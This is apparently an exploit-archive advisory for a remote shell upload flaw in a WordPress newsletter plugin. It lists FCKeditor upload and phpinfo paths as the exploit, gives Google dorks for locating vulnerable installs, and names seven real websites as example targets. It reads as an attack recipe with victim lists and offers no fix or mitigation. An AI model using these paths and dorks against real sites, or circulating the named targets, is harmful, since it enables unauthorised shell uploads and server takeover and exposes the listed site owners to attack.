WordPress St_Newsletter Swift Mailer Plugins 2.7 Shell Vuln

1. #################################################################################################
2.  
3. # Exploit Title : WordPress St_Newsletter Swift Mailer Plugins 2.7 Remote Shell Upload Vulnerability
4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
5. # Date : 20/12/2018
6. # Vendor Homepage : wordpress.org ~ forums.devnetwork.net ~ swiftmailer.symfony.com ~ swiftmailer.org
7. # Software Download Link : N/A ~ wordpress.org/plugins/swift-mailer/
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Version Information : 2.0 ~ 2.0.9 ~ 2.1.2 ~ 2.3 ~ 2.5.1 ~ 2.7
11. # Exploit Risk : Medium
12. # Google Dorks : inurl:''/wp-content/plugins/st_newsletter/''
13. + intext:''© 2016 Prevent Cancer Now SUM LogoSUM Brand + Design''
14. + intext:''Copyright © 2000-2012 Silicon Valley Fellowship''
15. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
16. + CWE-434: Unrestricted Upload of File with Dangerous Type
17. # Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~ ayarsecurity.com [ Friend ]
18.  
19. #################################################################################################
20.  
21. # Exploit :
22.  
23. /wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
24.  
25. /wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
26.  
27. /wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/browser/default/browser.html
28.  
29. /wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/browser/default/frmupload.html
30.  
31. /wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/fckeditor.html
32.  
33. # Directory File Path :
34.  
35. /wp-content/uploads/......
36.  
37. /wp-content/uploads/[YEAR]/[MONTH]....
38.  
39. # Exploit : phpinfo System Information
40.  
41. /wp-content/plugins/st_newsletter/Swift5/tests/units/runTests.php
42.  
43. #################################################################################################
44.  
45. # Note : This plugin St_Newsletter Swift Mailer contains a very serious vulnerability that allowed hackers to gain full control –
46.  
47. modify, upload and execute files on any website running WordPress. With the plugin installed on a certain website,
48.  
49. a hacker or malicious person can gain access to the web server via HTTP through a backdoor in the plugin’s directory.
50.  
51. #################################################################################################
52.  
53. # Example Vulnerable Sites =>
54.  
55. [+] revistamoviola.com/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
56.  
57. [+] earthnc.com/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
58.  
59. [+] siliconvalleyfellowship.org/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
60.  
61. [+] pedibus-geneve.ch/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
62.  
63. [+] parkdietzassociates.com/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
64.  
65. [+] storytellerwine.com/wine/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
66.  
67. [+] preventcancernow.ca/wp-content/plugins/st_newsletter/visual_editors/fckeditor/editor/filemanager/upload/test.html
68.  
69. #################################################################################################
70.  
71. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
72.  
73. #################################################################################################